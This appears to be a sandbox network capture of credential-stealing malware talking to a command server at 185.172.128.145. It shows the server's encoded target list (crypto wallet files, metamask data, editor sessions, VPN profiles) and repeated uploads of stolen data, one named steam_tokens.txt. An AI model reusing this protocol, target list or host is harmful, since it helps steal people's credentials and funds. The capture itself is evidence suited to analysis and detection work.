Feb 21, 2024 00:23:11.529324055 CET	467	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHIDAKECFIEBGDHJEBKK Host: 185.172.128.145 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 37 65 32 34 62 35 39 61 64 36 35 64 36 39 61 30 32 32 37 62 63 36 38 37 39 32 35 65 66 33 65 39 64 33 30 39 37 63 32 64 36 65 32 37 31 38 39 39 66 38 39 30 61 62 31 36 38 65 65 35 39 35 39 62 63 32 34 65 61 32 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 2d 2d 0d 0a Data Ascii: ------EHIDAKECFIEBGDHJEBKKContent-Disposition: form-data; name="token"d77e24b59ad65d69a0227bc687925ef3e9d3097c2d6e271899f890ab168ee5959bc24ea2------EHIDAKECFIEBGDHJEBKKContent-Disposition: form-data; name="message"files------EHIDAKECFIEBGDHJEBKK--
Feb 21, 2024 00:23:11.821466923 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2052 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 75 5a 79 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 5a 47 59 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 35 6e 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 6b 5a 69 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 35 6e 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 5a 47 59 73 4b 6d 31 6c 64 47 46 74 59 58 4e 72 4b 69 34 71 4c 43 70 56 56 45 4d 74 4c 53 6f 75 4b 6e 77 78 4e 54 41 77 66 44 46 38 4d 58 78 45 54 30 4e 54 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 52 45 39 44 55 33 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 6b 62 32 4e 34 4c 43 6f 75 65 47 78 7a 65 48 77 31 66 44 46 38 4d 58 78 53 52 55 4e 38 4a 56 4a 46 51 30 56 4f 56 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 55 6b 56 44 66 43 56 53 52 55 4e 46 54 6c 51 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 54 6b 39 55 52 56 42 42 52 48 77 6c 51 56 42 51 52 45 46 55 51 53 56 63 54 6d 39 30 5a 58 42 68 5a 43 73 72 58 48 77 71 4c 6e 68 74 62 48 77 78 4e 58 77 78 66 44 46 38 54 6b 39 55 52 56 42 42 52 48 77 6c 51 56 42 51 52 45 46 55 51 53 56 63 54 6d 39 30 5a 58 42 68 5a 43 73 72 58 47 4a 68 59 32 74 31 63 46 78 38 4b 69 34 71 66 44 45 31 66 44 46 38 4d 58 78 54 56 55 4a 4d 53 55 31 46 66 43 56 42 55 46 42 45 51 56 52 42 4a 56 78 54 64 57 4a 73 61 57 31 6c 49 46 52 6c 65 48 51 67 4d 31 78 4d 62 32 4e 68 62 46 78 54 5a 58 4e 7a 61 57 39 75 4c 6e 4e 31 59 6d 78 70 62 57 56 66 63 32 56 7a 63 32 6c 76 62 6c 78 38 4b 69 35 7a 64 57 4a 73 61 57 31 6c 58 79 70 38 4d 54 56 38 4d 58 77 78 66 46 5a 51 54 6c 39 44 61 58 4e 6a 62 31 5a 51 54 6e 77 6c 55 46 4a 50 52 31 4a 42 54 55 5a 4a 54 45 56 54 4a 56 78 63 4c 69 35 63 58 46 42 79 62 32 64 79 59 57 31 45 59 58 52 68 58 46 78 44 61 58 4e 6a 62 31 78 44 61 58 4e 6a 62 79 42 42 62 6e 6c 44 62 32 35 75 5a 57 4e 30 49 46 4e 6c 59 33 56 79 5a 53 42 4e 62 32 4a 70 62 47 6c 30 65 53 42 44 62 47 6c 6c 62 6e 52 63 55 48 4a 76 5a 6d 6c 73 5a 56 78 38 4b 69 35 34 62 57 78 38 4d 54 41 77 66 44 46 38 4d 48 78 57 55 45 35 66 52 6d 39 79 64 47 6c 75 5a 58 52 38 4a 56 42 53 54 30 64 53 51 55 Data Ascii: REVTS3wlREVTS1RPUCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8REVTS3wlREVTS1RPUCVcfCp3YWxsZXQqLnBuZywqd2FsbGV0Ki5wZGYsKmJhY2t1cCoucG5nLCpiYWNrdXAqLnBkZiwqcmVjb3ZlcioucG5nLCpyZWNvdmVyKi5wZGYsKm1ldGFtYXNrKi4qLCpVVEMtLSouKnwxNTAwfDF8MXxET0NTfCVET0NVTUVOVFMlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8RE9DU3wlRE9DVU1FTlRTJVx8Ki50eHQsKi5kb2N4LCoueGxzeHw1fDF8MXxSRUN8JVJFQ0VOVCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8UkVDfCVSRUNFTlQlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXHwqLnhtbHwxNXwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXGJhY2t1cFx8Ki4qfDE1fDF8MXxTVUJMSU1FfCVBUFBEQVRBJVxTdWJsaW1lIFRleHQgM1xMb2NhbFxTZXNzaW9uLnN1YmxpbWVfc2Vzc2lvblx8Ki5zdWJsaW1lXyp8MTV8MXwxfFZQTl9DaXNjb1ZQTnwlUFJPR1JBTUZJTEVTJVxcLi5cXFByb2dyYW1EYXRhXFxDaXNjb1xDaXNjbyBBbnlDb25uZWN0IFNlY3VyZSBNb2JpbGl0eSBDbGllbnRcUHJvZmlsZVx8Ki54bWx8MTAwfDF8MHxWUE5fRm9ydGluZXR8JVBST0dSQU
Feb 21, 2024 00:23:11.978513956 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECFCBKJDBFIJKFHIIDAA Host: 185.172.128.145 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:12.716298103 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:12.723154068 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFH Host: 185.172.128.145 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:13.060790062 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:13.068193913 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEBGCBAFCGDAAKFIDGIE Host: 185.172.128.145 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:13.402647018 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:13.409158945 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFIIIIJKFCAAECAKFIEH Host: 185.172.128.145 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:13.734599113 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:13.742193937 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGCFCBAKKFBFIECAEBAE Host: 185.172.128.145 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:14.077874899 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:14.085433006 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGD Host: 185.172.128.145 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:14.417721033 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:14.435189962 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBAKEBAECGCBAAAAAEBA Host: 185.172.128.145 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:14.774601936 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:14.782305956 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEGCBFCBFBKFHIECAFCF Host: 185.172.128.145 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:15.119508982 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:15.130588055 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEBKJDBAAKJDGCBFHCFC Host: 185.172.128.145 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:15.463928938 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:15.472371101 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJECFIECBGDGCAAAEHI Host: 185.172.128.145 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:15.810858965 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:15.826145887 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFH Host: 185.172.128.145 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:16.162595987 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:16.172192097 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEBGIIJDGHCBGCBFIEG Host: 185.172.128.145 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:16.506350040 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:16.615809917 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECFHDBAAECAAKFHDHII Host: 185.172.128.145 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:16.952214003 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:16.958884001 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAAAKJKJEBGHJKFHIDGC Host: 185.172.128.145 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:17.294306040 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:17.303730011 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFCAFIIDHIDGHIECGDGI Host: 185.172.128.145 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:17.639497995 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:17.656145096 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIIEHJDBKJKECBFHDGHJ Host: 185.172.128.145 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:17.990565062 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:18.016470909 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKJJEBKKEHJDGCBGCFCG Host: 185.172.128.145 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:18.354177952 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:18.360428095 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGIJJKEHCAKEGCAKJKEC Host: 185.172.128.145 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:18.694653034 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:18.702912092 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFCGIIEHIEGDGDGCAEBG Host: 185.172.128.145 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:19.042653084 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:19.049899101 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKFHCGIDBAAFHIDHDAAE Host: 185.172.128.145 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:19.380081892 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:19.386631966 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHIJJDGDHDGDAKFIECFI Host: 185.172.128.145 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:19.722492933 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:19.728373051 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFH Host: 185.172.128.145 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:20.062463045 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:20.082601070 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGD Host: 185.172.128.145 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:20.420845985 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:20.428284883 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBAKEBAECGCBAAAAAEBA Host: 185.172.128.145 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:20.758830070 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:20.773960114 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBAKJEHDBGHIEBGCGDGH Host: 185.172.128.145 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:21.106065989 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:21.114602089 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHCGCFHDHIIIDGCAAEGD Host: 185.172.128.145 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:21.452455044 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:21.458976030 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFII Host: 185.172.128.145 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:21.795372009 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:21.813276052 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KECBFBAEBKJJJJKFCGCB Host: 185.172.128.145 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:22.162746906 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:22.171582937 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEBGIIJDGHCBGCBFIEG Host: 185.172.128.145 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:22.512470961 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:22.541737080 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHIDAKECFIEBGDHJEBKK Host: 185.172.128.145 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:22.877068996 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:22.899118900 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJECAEHJJJKJKFIDGCBG Host: 185.172.128.145 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:23.235178947 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:23.255867004 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCB Host: 185.172.128.145 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:23.595726013 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:23.687926054 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHDAKKJJJKJKECBGCGDA Host: 185.172.128.145 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:24.027019024 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:24.330220938 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHDHCGHDHIDHCBGCBGCA Host: 185.172.128.145 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:24.671175957 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:25.767222881 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDAAKKEHDHCAAAKFCBAK Host: 185.172.128.145 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:26.103694916 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:26.122509003 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEBKJDBAAKJDGCBFHCFC Host: 185.172.128.145 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:26.460242987 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:26.558908939 CET	565	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCFBFBFBKFIDHJKFCAFC Host: 185.172.128.145 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 37 65 32 34 62 35 39 61 64 36 35 64 36 39 61 30 32 32 37 62 63 36 38 37 39 32 35 65 66 33 65 39 64 33 30 39 37 63 32 64 36 65 32 37 31 38 39 39 66 38 39 30 61 62 31 36 38 65 65 35 39 35 39 62 63 32 34 65 61 32 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 